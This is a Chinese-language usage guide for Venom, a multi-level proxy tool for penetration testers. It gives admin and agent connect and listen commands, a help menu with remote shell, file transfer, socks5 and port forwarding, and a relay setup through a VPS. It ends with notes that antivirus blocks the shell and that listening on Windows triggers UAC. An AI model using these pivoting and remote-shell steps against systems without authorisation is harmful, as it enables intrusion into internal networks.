Venom代理转发-多级穿透

简介

• Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具。
• Venom可将多个节点进行连接，然后以节点为跳板，构建多级代理。
• 渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网，并轻松地管理代理节点。

下载

下载地址

linux下需要赋予执行权限

chmod +x filename

使用

admin端连接指令

监听：

admin -lport 8888

连接：

admin -rhost 127.0.0.1 -rport 9999 -passwd 9999

-passwd为节点间通信加密密匙，需要两端同时开启相同密码

agent端连接指令

监听：

agent -lport 8888 -passwd 123456

连接：

agent -rhost 127.0.0.1 -rport 9999

admin节点内置命令

(admin node) >>> help

  help                                     Help information.
  exit                                     Exit.
  show                                     Display network topology.
  getdes                                   View description of the target node.
  setdes     [info]                        Add a description to the target node.
  goto       [id]                          Select id as the target node.
  listen     [lport]                       Listen on a port on the target node.
  connect    [rhost] [rport]               Connect to a new node through the target node.
  sshconnect [user@ip:port] [dport]        Connect to a new node through ssh tunnel.
  shell                                    Start an interactive shell on the target node.
  upload     [local_file]  [remote_file]   Upload files to the target node.
  download   [remote_file]  [local_file]   Download files from the target node.
  socks      [lport]                       Start a socks5 server.
  lforward   [lhost] [sport] [dport]       Forward a local sport to a remote dport.
  rforward   [rhost] [sport] [dport]       Forward a remote sport to a local dport.

介绍几个使用中没有实例的功能，其余在实例中展示

• socks建立到某节点的socks5代理

实际使用过程中，目标开启socks，有时候显示不支持问题，因此放在此处展示

结构介绍

通过vps中转，admin在本地即可
vps端（node 1）：监听端口

./agent_linux_x86 -lport 12222

客户端（node 2）：

./agent_linux_x64 -rhost xxx.xxx.xxx.xxx -rport 12222

客户端（node 3）：

agent.exe -rhost xxx.xxx.xxx.xxx -rport 12222

admin端：

admin.exe -rhost xxx.xxx.xxx.xxx -rport 12222```

监听node 2 的1000端口

agent.exe -rhost xxx.xxx.xxx.xxx -rport 10000

Note: 1. 杀软会拦截shell
	  2. windows打开监听端口会触发UAC